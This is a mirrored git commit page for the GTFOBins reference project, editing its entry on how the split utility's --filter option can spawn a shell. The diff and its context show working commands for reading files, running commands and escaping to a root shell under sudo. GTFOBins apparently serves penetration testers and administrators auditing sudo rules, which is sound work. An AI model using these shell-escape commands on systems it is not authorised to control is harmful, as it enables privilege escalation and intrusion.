mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 22:09:35 +01:00
Improve split
This commit is contained in:
parent
2475ea0a5a
commit
fbe4b42890
@ -7,7 +7,7 @@ functions:
|
||||
split $LFILE $TF
|
||||
cat $TF*
|
||||
command:
|
||||
- description: Command execution using an existing or new created file.
|
||||
- description: Command execution using an existing or newly created file.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
@ -17,9 +17,11 @@ functions:
|
||||
COMMAND=id
|
||||
echo | split --filter=$COMMAND /dev/stdin
|
||||
shell:
|
||||
- code: |
|
||||
split --filter=bash /dev/stdin
|
||||
- description: The shell prompt is not printed.
|
||||
code: |
|
||||
split --filter=/bin/sh /dev/stdin
|
||||
sudo:
|
||||
- code: |
|
||||
split --filter=bash /dev/stdin
|
||||
- description: The shell prompt is not printed.
|
||||
code: |
|
||||
split --filter=/bin/sh /dev/stdin
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user